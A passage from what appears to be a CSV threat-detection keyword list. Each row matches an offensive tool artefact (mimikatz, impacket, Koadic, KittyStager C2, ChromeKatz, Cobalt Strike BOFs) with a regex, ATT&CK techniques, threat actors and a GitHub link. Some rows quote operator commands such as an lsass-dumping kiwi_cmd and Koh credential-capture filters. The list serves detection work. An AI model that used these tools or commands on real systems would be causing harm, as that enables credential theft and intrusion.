Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*kiosk.sh*startVNC.sh*",".{0,1000}kiosk\.sh.{0,1000}startVNC\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*kirbi.tickets*",".{0,1000}kirbi\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kirbi_to_hashcat.py*",".{0,1000}kirbi_to_hashcat\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*kirbi2john.*",".{0,1000}kirbi2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*kirbikator.exe*",".{0,1000}kirbikator\.exe.{0,1000}","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","10","1336","206","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z" "*kite03/echoac-poc*",".{0,1000}kite03\/echoac\-poc.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*kitrap0d.x86.dll*",".{0,1000}kitrap0d\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kitrap0d_payload*",".{0,1000}kitrap0d_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kitten.dll*",".{0,1000}kitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*kitten/basicKitten*",".{0,1000}kitten\/basicKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*kitten_test.go*",".{0,1000}kitten_test\.go.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Kittens love cookies too! >:3*",".{0,1000}Kittens\slove\scookies\stoo!\s\>\:3.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*kittens/bananaKitten*",".{0,1000}kittens\/bananaKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Kittielocal -*",".{0,1000}Kittielocal\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*KittyStager -*",".{0,1000}KittyStager\s\-.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager ?*",".{0,1000}KittyStager\s\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager ??*",".{0,1000}KittyStager\s\?\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager.git*",".{0,1000}KittyStager\.git.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager/cmd*",".{0,1000}KittyStager\/cmd.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager/internal*",".{0,1000}KittyStager\/internal.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager/kitten*",".{0,1000}KittyStager\/kitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Kiwi Legit Printer*",".{0,1000}Kiwi\sLegit\sPrinter.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*",".{0,1000}KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*kiwi_cmd *",".{0,1000}kiwi_cmd\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kiwi_cmd*/process:lsass.exe*",".{0,1000}kiwi_cmd.{0,1000}\/process\:lsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*KIWI_KERBEROS_BUFFER*",".{0,1000}KIWI_KERBEROS_BUFFER.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*klezVirus/CheeseTools*",".{0,1000}klezVirus\/CheeseTools.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*klezVirus/inceptor*",".{0,1000}klezVirus\/inceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*klezVirus/SilentMoonwalk*",".{0,1000}klezVirus\/SilentMoonwalk.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*klsecservices*",".{0,1000}klsecservices.{0,1000}","offensive_tool_keyword","Github Username","exploitation tools for attackers","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/klsecservices","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*klsecservices/rpivot*",".{0,1000}klsecservices\/rpivot.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*knavesec/CredMaster*",".{0,1000}knavesec\/CredMaster.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*kncchdigobghenbbaddojjnnaogfppfj*",".{0,1000}kncchdigobghenbbaddojjnnaogfppfj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*known_hosts2john.py*",".{0,1000}known_hosts2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Koadic.persist*",".{0,1000}Koadic\.persist.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_load.*",".{0,1000}koadic_load\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_net.*",".{0,1000}koadic_net\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_process.*",".{0,1000}koadic_process\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_types.*",".{0,1000}koadic_types\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_util.*",".{0,1000}koadic_util\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koh filter add SID*",".{0,1000}koh\sfilter\sadd\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh filter list*",".{0,1000}koh\sfilter\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh filter remove SID*",".{0,1000}koh\sfilter\sremove\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh filter reset*",".{0,1000}koh\sfilter\sreset.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 